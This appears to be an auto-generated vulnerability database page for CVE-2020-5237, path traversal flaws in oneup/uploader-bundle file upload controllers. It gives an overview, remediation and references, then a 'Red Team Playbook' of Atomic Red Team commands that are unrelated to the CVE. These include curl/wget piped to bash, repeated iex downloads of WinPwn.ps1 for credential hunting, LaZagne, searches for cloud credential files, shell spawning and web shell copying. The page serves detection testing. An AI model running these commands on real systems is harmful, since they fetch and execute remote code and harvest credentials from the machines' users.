CVE-2020-5237
Overview
This vulnerability consists of multiple relative path traversal flaws within the oneup/uploader-bundle's file upload controllers. The root cause is insufficient validation and sanitization of user-supplied filename and chunk-related parameters, allowing manipulation of file paths. Affected components include BlueimpController.php, DropzoneController.php, FineUploaderController.php, MooUploadController.php, and PluploadController.php, all responsible for handling file upload requests.
Vulnerability Description
Multiple relative path traversal vulnerabilities in the oneup/uploader-bundle before 1.9.3 and 2.1.5 allow remote attackers to upload, copy, and modify files on the filesystem (potentially leading to arbitrary code execution) via the (1) filename parameter to BlueimpController.php; the (2) dzchunkindex, (3) dzuuid, or (4) filename parameter to DropzoneController.php; the (5) qqpartindex, (6) qqfilename, or (7) qquuid parameter to FineUploaderController.php; the (8) x-file-id or (9) x-file-name parameter to MooUploadController.php; or the (10) name or (11) chunk parameter to PluploadController.php. This is fixed in versions 1.9.3 and 2.1.5.
Impact
An authenticated attacker with network access can exploit this vulnerability to upload or overwrite arbitrary files on the server, potentially enabling arbitrary code execution. The exploit requires low privileges (PR:L) but no user interaction (UI:N) and can be performed remotely (AV:N). Successful exploitation may lead to full compromise of the affected system, data breaches, and disruption of service continuity, as indicated by the CVSS vector with high confidentiality, integrity, and availability impacts.
Solution
Remediation involves upgrading the oneup/uploader-bundle to version 1.9.3 or 2.1.5 or later, where the path traversal vulnerabilities have been fixed. Detailed patch information and upgrade instructions are available in the official GitHub security advisory GHSA-x8wj-6m73-gfqp and the related commit a6011449b716f163fe1ae323053077e59212350c. Users should apply these updates promptly to mitigate the risk.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The identified vulnerabilities within the oneup/uploader-bundle stem from multiple relative path traversal issues that allow remote attackers to manipulate file uploads on the server's filesystem. This type of vulnerability occurs when an application does not properly validate user input, allowing an attacker to craft requests that traverse the directory structure. Specifically, the filename and other parameters in various controllers, such as BlueimpController.php and DropzoneController.php, can be exploited to upload malicious files or overwrite existing files on the server. The lack of stringent validation checks enables attackers to bypass security mechanisms, leading to potential arbitrary code execution.
Exploitation of these vulnerabilities can occur through various attack vectors. An attacker could craft a malicious request that includes specially formatted parameters to navigate the filesystem and upload a web shell or other malicious payloads. For instance, by manipulating the filename parameter, an attacker could upload a PHP script disguised as an image file. Once uploaded, this script could be executed by accessing it through a web browser, giving the attacker control over the server. Additionally, parameters such as dzchunkindex and dzuuid in the DropzoneController.php can be leveraged to facilitate large file uploads, further increasing the risk of exploitation through automated scripts.
The real-world impact of these vulnerabilities is significant, particularly for businesses that rely on the oneup/uploader-bundle for file uploads. Successful exploitation could lead to unauthorized access to sensitive data, data loss, or complete system compromise. The ability to execute arbitrary code on the server can result in further attacks, such as data exfiltration, ransomware deployment, or the establishment of persistent backdoors. The financial implications of such breaches can be severe, including costs related to incident response, legal liabilities, and reputational damage. Organizations may also face regulatory scrutiny, especially if sensitive customer data is involved.
To detect and mitigate these vulnerabilities, organizations should implement a multi-layered security approach. First, it is crucial to ensure that the oneup/uploader-bundle is updated to the latest versions, which include patches for these vulnerabilities. Regularly reviewing and updating all software components is essential to protect against known vulnerabilities. Additionally, implementing strict input validation and sanitization measures can help prevent path traversal attacks. This includes validating file names and paths against a whitelist of acceptable values and ensuring that user-uploaded files are stored outside of the web root.
Monitoring and logging file upload activities can also aid in detecting potential exploitation attempts. Intrusion detection systems (IDS) can be configured to alert administrators of suspicious file upload patterns or unexpected file types. Furthermore, employing web application firewalls (WAF) can provide an additional layer of protection by filtering out malicious requests before they reach the application. By combining these strategies, organizations can significantly reduce the risk associated with these vulnerabilities and enhance their overall security posture.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
1up | Oneupuploaderbundle | All |
cpe:2.3:a:1up:oneupuploaderbundle:*:*:*:*:*:*:*:*
|
|
|
1up | Oneupuploaderbundle | All |
cpe:2.3:a:1up:oneupuploaderbundle:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-5237 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/1up-lab/OneupUploaderBundle/security/advisories/GHSA-x8wj-6m73-gfqp |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/1up-lab/OneupUploaderBundle/commit/a6011449b716f163fe1ae323053077e59212350c |
| syss.de |
GitHub CVE
x_refsource_MISC
|
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-003.txt |